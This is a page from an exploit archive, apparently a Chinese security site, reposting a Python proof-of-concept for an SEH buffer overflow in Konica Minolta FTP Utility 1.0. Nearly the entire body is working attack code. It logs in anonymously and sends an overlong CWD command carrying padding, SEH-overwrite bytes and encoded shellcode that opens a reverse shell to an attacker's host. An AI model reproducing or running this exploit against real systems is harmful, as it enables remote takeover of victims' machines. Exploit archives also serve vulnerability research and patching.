Konica Minolta FTP Utility 1.0 SEH Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Konica Minolta FTP Utility 1.0 SEH Buffer Overflow

来源：mandar0x01 at gmail.com 作者：Jadhav 发布时间：2016-06-01

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 1037 #offset to EIP

#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python (replace LHOST with an attacker's IP)

buf = ""
buf += "\xdb\xd2\xbf\xcc\xee\x99\xa8\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x5f\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x2e"
buf += "\x1b\x22\x04\x1b\xad\xcc\x8f\xb3\xf7\x9b\x0b\xc7\x56"
buf += "\x4d\x9d\x96\x3f\xbc\x43\xcd\x3c\x50\x87\xee\x1c\xbc"
buf += "\x9a\xa9\xc8\x34\x1a\x9c\xbe\xb0\x57\x29\xe3\xb4\x80"
buf += "\x3a\x80\x08\xee\x19\xf4\xd3\xc7\x43\x35\x0e\xb3\x85"
buf += "\x74\x16\x36\x51\xc5\xa5\xe0\x5b\xf0\x29\x11\x62\x83"
buf += "\x56\x98\x21\xea\x69\x23\x10\x7c\x65\x02\x77\x70\xdc"
buf += "\x5a\xd9\x6e\xc5\x55\x07\x15\xba\xb4\x10\xf5\xee\x73"
buf += "\xbc\x17\x68\xe3\x78\x89\x60\x95\x1c\x62\xba\x1f\x60"
buf += "\xd8\x65\x41\xf7\x0c\x30\x56\x08\x79\xd2\x32\x0e\x03"
buf += "\x56\xbf\x9e\xbf\xf7\xba\xe2\xaa\x96\x9d\x1d\x62\xdd"
buf += "\xa7\xbb\x40\x53\xa2\x0f\xd8\x25\x4a\x4e\x4d\x38\xa9"
buf += "\xb6\xb0\x48\x51\xba\x5e\x6d\x23\x80\xd4\x45\x61\x14"
buf += "\x82\xc4\x6d\x69\x93\x19\x69\xe9\x8c\x24\x01\xb5\x68"
buf += "\xc4\xfe\x95\x69\x0c\xa1\x71\xd2\x5d\xb8\x90\x06\x31"
buf += "\xfa\xfe\xf8\x61\x35\x46\xc8\xcb\xf8\x57\xac\x85\x06"
buf += "\x2b\x6d\x02\xb2\x4b\xca\x0e\x87\xaf\x7d\x43\x6b\x1c"
buf += "\x03\x42\x13\xfe\x16\x9c\x70\xf2\xaf\x34\x6e\x42\x2b"
buf += "\xba\xf2\x62\xdc\x9a\x55\x4a\x46\x08\x04\x7a\x8e\x26"
buf += "\x95\xa8\x72\x8e\x8c\x83\xef\xcd\xb6\x10\x91\xfe\xda"
buf += "\x3a\x15\xba\x7c\xef\x24\x1c\x9d\xb7\x57\xe9\x60\x7f"
buf += "\x06\xd3\xf6\x7b\x85\x7b\xd3\xb2\x8c\x30\x85\xb7\x56"
buf += "\x41\x7f\x6c\xab\x01\x7a\x1b\x77\xcf\xd5\x0c\x85\xce"
buf += "\xb6\x6f\x5f\xfb\xc7\x43\xc8\x13\xfe\xae\xcc\xea\xe6"
buf += "\x40\x61\x2c\x75\xdb\x9a\x6b\x03\x80\xc1\x69\xc8\x5f"
buf += "\x16\x31\x16\xf4\x50\x45\x99\xa9\xc5\x7f\xa0\x64\x59"
buf += "\xb3\x95\xe1\xb7\xa6\xe0\x36\x2a\xe3\xc7\xcb\x09\xb0"
buf += "\x84\x37\x67\xa2\x91\xbd\xb8\x38\x26\x68\xa8\x67\x81"
buf += "\x5e\x89\xf8\xf3\x30\xd2\xc2\x37\x25\x2d\x99\xf2\xad"
buf += "\x34\xdf\x21\x2b\x43\xcd\x18\xa0\x95\x9e\xa9\xe4\x44"
buf += "\xb0\xcd"

nseh = "\xeb\x10\x90\x90"
seh = "\xb0\x63\x20\x12"
exploit = junk + nseh + seh + "\x90" *20 + buf + "\x42" * 500
print "sending"
s.connect(('x.x.x.x',21)) # Insert target IP
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('CWD ' +exploit+ '\r\n')
s.close

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告